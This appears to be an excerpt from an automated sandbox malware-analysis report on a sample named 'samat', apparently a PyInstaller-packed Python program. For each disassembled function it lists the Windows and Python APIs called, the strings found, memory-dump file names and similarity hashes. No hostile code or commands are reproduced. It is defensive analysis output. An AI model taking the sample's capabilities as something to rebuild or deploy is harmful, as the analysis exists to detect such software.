Download Yara Rule

APIs

memcpy.VCRUNTIME140 ref: 00007FF8B7E84A34
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E84A44
PyErr_Format.PYTHON313 ref: 00007FF8B7E84A70
memcpy.VCRUNTIME140 ref: 00007FF8B7E84A82
_Py_NewReference.PYTHON313 ref: 00007FF8B7E84A8A

Strings

PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d, xrefs: 00007FF8B7E84A66

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: memcpy$Err_FormatReferencemalloc
String ID: PyDEVMODE::PyDEVMODE - Unable to allocate DEVMODE of size %d
API String ID: 3577276951-318570358
Opcode ID: 96d05b4b8ad6c57b41a39e5f0ab8f2408ee3286b050f5ce7c13a181665dd239a
Instruction ID: 97cdfcab90529fd871a52b104db25ce6f6fb7dd5ec628a59c77203532d3fdd16
Opcode Fuzzy Hash: 96d05b4b8ad6c57b41a39e5f0ab8f2408ee3286b050f5ce7c13a181665dd239a
Instruction Fuzzy Hash: 2101E562A08B12A2EB148F9AE95407C7364FF48FC5B844035EB5E07766EF3DE4A4C310

Function 00007FF8B7E8C890 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

PyArg_ParseTuple.PYTHON313 ref: 00007FF8B7E8C8B5
PyErr_SetString.PYTHON313 ref: 00007FF8B7E8C8DD
IsTextUnicode.ADVAPI32 ref: 00007FF8B7E8C8F6
Py_BuildValue.PYTHON313 ref: 00007FF8B7E8C90A

Strings

string size beyond INT_MAX, xrefs: 00007FF8B7E8C8D3
s#i, xrefs: 00007FF8B7E8C8AE

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: Arg_BuildErr_ParseStringTextTupleUnicodeValue
String ID: s#i$string size beyond INT_MAX
API String ID: 2273782283-3494499060
Opcode ID: 4b5c9164ba692dd86c3d625a5a86657bc7a4acf53301f7ed8babcb47b8e01204
Instruction ID: 6f15e47d43f7e737a74862e24906107f18d15b96345dcfc0d29ee8088ed423b1
Opcode Fuzzy Hash: 4b5c9164ba692dd86c3d625a5a86657bc7a4acf53301f7ed8babcb47b8e01204
Instruction Fuzzy Hash: 0601FF76F18B4692DB009B99E4540AD63A1FF85FD4F804132E64D877B5DE3CE509C740

Function 00007FF8B7E893F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

IsValidSid.ADVAPI32 ref: 00007FF8B7E893FD
PyErr_SetString.PYTHON313 ref: 00007FF8B7E89418
GetSidIdentifierAuthority.ADVAPI32 ref: 00007FF8B7E8942A
Py_BuildValue.PYTHON313 ref: 00007FF8B7E89460

Strings

GetSidIdentifierAuthority: Invalid SID in object, xrefs: 00007FF8B7E8940E
(BBBBBB), xrefs: 00007FF8B7E8944F

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: AuthorityBuildErr_IdentifierStringValidValue
String ID: (BBBBBB)$GetSidIdentifierAuthority: Invalid SID in object
API String ID: 4045288465-3761804006
Opcode ID: 615ff364ecf4b2f6fbb4577ac1032b11da4648b0c55427ed7780864fcfb30ffc
Instruction ID: 78ab62e824c5a78cbf2237c25d9eb76c693986b7e9522cc7f936d32f3771f351
Opcode Fuzzy Hash: 615ff364ecf4b2f6fbb4577ac1032b11da4648b0c55427ed7780864fcfb30ffc
Instruction Fuzzy Hash: A9012862A1869282EB418B69A85043D7BA0FF85FC6F098071EA9E42361CF3CC5658710

Function 00007FF8B7E8BFF0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

Py_MakePendingCalls.PYTHON313 ref: 00007FF8B7E8BFF4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8B7E8C005
fprintf.MSPDB140-MSVCRT ref: 00007FF8B7E8C015

Part of subcall function 00007FF8B7E8BC60: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF8B7E8BC97

PyErr_Clear.PYTHON313 ref: 00007FF8B7E8C01A
Py_MakePendingCalls.PYTHON313 ref: 00007FF8B7E8C020

Strings

Unhandled exception detected before entering Python., xrefs: 00007FF8B7E8C00E

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: CallsMakePending$ClearErr___acrt_iob_func__stdio_common_vfprintffprintf
String ID: Unhandled exception detected before entering Python.
API String ID: 322838838-920423093
Opcode ID: bbccaab3a7c4ad21d36c60cf5a593e4e3c5db407707c02aee8003046da95ed00
Instruction ID: ea32e8a9ad5c2f4032bc97867cb1384c0f1f86ccb56828d6ef3921a8a125f45a
Opcode Fuzzy Hash: bbccaab3a7c4ad21d36c60cf5a593e4e3c5db407707c02aee8003046da95ed00
Instruction Fuzzy Hash: DDE01211E0D703A1F7042BEDEC8563D22645F45FC5F810174D70F412F2EE3CA4898210

Function 00007FF7E12C8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8F5A

Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C8FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C9055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF7E12C3FB1), ref: 00007FF7E12C906A

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction ID: 32fed1b1886a366e95b6ad5dbc68e2d71c9ae68cfe8699d04e55929775e055ee
Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction Fuzzy Hash: 5141D762B1968281EF30AB11A8013BAB398FF85BD4F854136DF4E57789DEBDD501C721

Function 00007FF8B8261D30 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8261D99
_aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8261E06
_aligned_malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8261E22
_aligned_free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8261E5E
_aligned_free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8261E6D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B8261E76

Memory Dump Source

Source File: 00000008.00000002.4573993442.00007FF8B8261000.00000020.00000001.01000000.0000002F.sdmp, Offset: 00007FF8B8260000, based on PE: true

Associated: 00000008.00000002.4573922181.00007FF8B8260000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574064690.00007FF8B8263000.00000002.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574129290.00007FF8B8264000.00000004.00000001.01000000.0000002F.sdmpDownload File
Associated: 00000008.00000002.4574205224.00007FF8B8265000.00000002.00000001.01000000.0000002F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b8260000_samat.jbxd

Similarity

API ID: _aligned_free_aligned_malloc$callocfree
String ID:
API String ID: 2511558924-0
Opcode ID: 8fb2105fd7c39bf321232f7441f6f1b7ebcf620c9448f78960a77339e4ca462d
Instruction ID: cf213de5ba68525999b3dd5cb5ca03bc3c4bb761dfa14be36737d6f78a858052
Opcode Fuzzy Hash: 8fb2105fd7c39bf321232f7441f6f1b7ebcf620c9448f78960a77339e4ca462d
Instruction Fuzzy Hash: B0412866A09A4283EA15CB49E45027873A0FF88B92F484531CF4D43794EF7CF89AC304

Function 00007FF8B7E8B2E0 Relevance: 9.1, APIs: 6, Instructions: 86COMMON

Download Yara Rule

APIs

PyList_New.PYTHON313 ref: 00007FF8B7E8B320
PyList_Append.PYTHON313 ref: 00007FF8B7E8B38B
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8B3A5

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: List_$AppendDealloc
String ID:
API String ID: 1573934073-0
Opcode ID: 7df2b78d6d5287c60bc640f919dbf0db1eaa50ea8ef363c97fcee23fcdab4804
Instruction ID: 7270f902f1f22b1f25fa771ad7d58ecce67d9611d67783e044bcf85dd89cbbb9
Opcode Fuzzy Hash: 7df2b78d6d5287c60bc640f919dbf0db1eaa50ea8ef363c97fcee23fcdab4804
Instruction Fuzzy Hash: A4313932E09B4286FA585F1AE55427D62B0AF04FE4F885234EB6E46BF2DF7CE4518300

Function 00007FF8B7E8B420 Relevance: 9.1, APIs: 6, Instructions: 77COMMON

Download Yara Rule

APIs

PyList_New.PYTHON313 ref: 00007FF8B7E8B460
PyBytes_FromStringAndSize.PYTHON313 ref: 00007FF8B7E8B496
PyList_Append.PYTHON313 ref: 00007FF8B7E8B4AA
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8B4C4

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: List_$AppendBytes_DeallocFromSizeString
String ID:
API String ID: 3583985797-0
Opcode ID: fa9e8c22ace8bfa2a7f8576b109cd451eb3fbd3c9cda2f4208ba26d535e53f9c
Instruction ID: 76ecd9143cab5add8583870cbb39e3cdf5544a04427a1c30a29b90abc9d6bdde
Opcode Fuzzy Hash: fa9e8c22ace8bfa2a7f8576b109cd451eb3fbd3c9cda2f4208ba26d535e53f9c
Instruction Fuzzy Hash: 8D311C32E0974286FA694F69A55423C62A1AF45FE4F8C5234DB6E467E6EF3CE4518300

Function 00007FF7E12C90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7E12C8570: GetCurrentProcess.KERNEL32 ref: 00007FF7E12C8590
Part of subcall function 00007FF7E12C8570: OpenProcessToken.ADVAPI32 ref: 00007FF7E12C85A3
Part of subcall function 00007FF7E12C8570: GetTokenInformation.ADVAPI32 ref: 00007FF7E12C85C8
Part of subcall function 00007FF7E12C8570: GetLastError.KERNEL32 ref: 00007FF7E12C85D2
Part of subcall function 00007FF7E12C8570: GetTokenInformation.ADVAPI32 ref: 00007FF7E12C8612
Part of subcall function 00007FF7E12C8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF7E12C862E
Part of subcall function 00007FF7E12C8570: CloseHandle.KERNEL32 ref: 00007FF7E12C8646

LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C916C
LocalFree.KERNEL32(?,00007FF7E12C3C55), ref: 00007FF7E12C9175

Strings

D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF7E12C9142
D:(A;;FA;;;%s), xrefs: 00007FF7E12C9157
S-1-3-4, xrefs: 00007FF7E12C9121
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF7E12C9183

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: 395dd86bfe94c07938228bacbb809f435052dff1d1ec76479bf52faa911c552e
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: 4E213021B0864282EB11BB10EC163EAA259FF84780FC54437EA4E57795DFBCD545C761

Function 00007FF7E12DB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB2D7
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB30D
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB33A
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB34B
FlsSetValue.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB35C
SetLastError.KERNEL32(?,?,?,00007FF7E12D4F11,?,?,?,?,00007FF7E12DA48A,?,?,?,?,00007FF7E12D718F), ref: 00007FF7E12DB377

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
Instruction ID: c2785f4d0c6c6e77735e094ba26bb851b6f48a53924aa4012a7835b23b76f85b
Opcode Fuzzy Hash: 8fefcbba4d209cc5a194374eabcf6afe7ae299e3690268f17104ea0393047aa2
Instruction Fuzzy Hash: 6F118E22B0C64282FB957721DD5337D914AAF497B0F804736DC2E477D6DEBDA4114322

Function 00007FF8B7E86FF0 Relevance: 9.1, APIs: 6, Instructions: 56COMMON

Download Yara Rule

APIs

_Py_NewReference.PYTHON313(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8700D

Part of subcall function 00007FF8B7E8E768: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E8E782

_Py_NewReference.PYTHON313(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8703A
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E87045
InitializeSecurityDescriptor.ADVAPI32(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8705E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E87076
_Py_Dealloc.PYTHON313(?,?,?,00007FF8B7E86F26), ref: 00007FF8B7E8709A

Part of subcall function 00007FF8B7E87D20: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D3B
Part of subcall function 00007FF8B7E87D20: GetSecurityDescriptorLength.ADVAPI32(?,?,?,00007FF8B7E81931), ref: 00007FF8B7E87D44

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DescriptorReferenceSecurityfreemalloc$DeallocInitializeLength
String ID:
API String ID: 2040291429-0
Opcode ID: 5a263e4a360b5c9879a8c6137d038cbb60ca2fb05632f21eee30b9500df43a29
Instruction ID: a56b3658095ccdae42b00b8412d7218b37c3b42c1d4c090c8215f283ba5d8f8f
Opcode Fuzzy Hash: 5a263e4a360b5c9879a8c6137d038cbb60ca2fb05632f21eee30b9500df43a29
Instruction Fuzzy Hash: 0E211432A09B4692EB048F99E85422D73A4FF48FC4F844038DB5D43BA5EF3DE5648340

Function 00007FF8B7E8DA70 Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 00007FF8B7E8DA7C
PyThreadState_Delete.PYTHON313 ref: 00007FF8B7E8DA93
TlsSetValue.KERNEL32 ref: 00007FF8B7E8DAA1
LocalFree.KERNEL32 ref: 00007FF8B7E8DAAA
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8DACF
_Py_Dealloc.PYTHON313 ref: 00007FF8B7E8DAF2

Memory Dump Source

Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true

Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd

Similarity

API ID: DeallocValue$DeleteFreeLocalState_Thread
String ID:
API String ID: 1066789969-0
Opcode ID: d72e0d609fdda2483786e1d5aaac3537aadc1cecc1d2818175353a1866a79386
Instruction ID: 8841c8952ae80b6140f02f1511fa8df327008adb9ef9d17e389664d838adfada
Opcode Fuzzy Hash: d72e0d609fdda2483786e1d5aaac3537aadc1cecc1d2818175353a1866a79386
Instruction Fuzzy Hash: 6E11933990EB0682FB598F6DA85413C23B0AF49FD1F684174DB0E463B1CE3DA8959711

Function 00007FF7E12C2910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF7E12C1B6A), ref: 00007FF7E12C295E

Strings

[PYI-%d:ERROR] , xrefs: 00007FF7E12C2966
Error, xrefs: 00007FF7E12C2A0E
%s: %s, xrefs: 00007FF7E12C29E8
Error [ANSI Fallback], xrefs: 00007FF7E12C29FF

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction ID: 54c640665c14ceb6c072caddbdcc2b4df747597f7b34f72176d4332f90c746b2
Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
Instruction Fuzzy Hash: 2E31E222B1868156E721B765AC423E7A299BF887D4F804133FE8D93759EFBCD146C321

Function 00007FF7E12C2390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7E12C23C8
DialogBoxIndirectParamW.USER32 ref: 00007FF7E12C248E
DeleteObject.GDI32 ref: 00007FF7E12C24C1
DestroyIcon.USER32 ref: 00007FF7E12C24D3

Strings

Unhandled exception in script, xrefs: 00007FF7E12C23F8

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction ID: aa0dff722b30b4cfb83da9bd7c0b966bfee5cc2ab23a599afea3be46d430aeed
Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
Instruction Fuzzy Hash: CE315222B19A8249EB21EB21EC562F9A364FF88788F844137EA4D47B59DF7CD105C712

Function 00007FF7E12C2B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7E12C918F,?,00007FF7E12C3C55), ref: 00007FF7E12C2BA0
MessageBoxW.USER32 ref: 00007FF7E12C2C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF7E12C2BA8
WARNING, xrefs: 00007FF7E12C2BAF
Warning, xrefs: 00007FF7E12C2C1D

Memory Dump Source

Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true

Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
Instruction ID: 61fa9ac32d8e62258f04e4c59ce8d764f5ec8c28df1fdfa070871f73a747d3e8
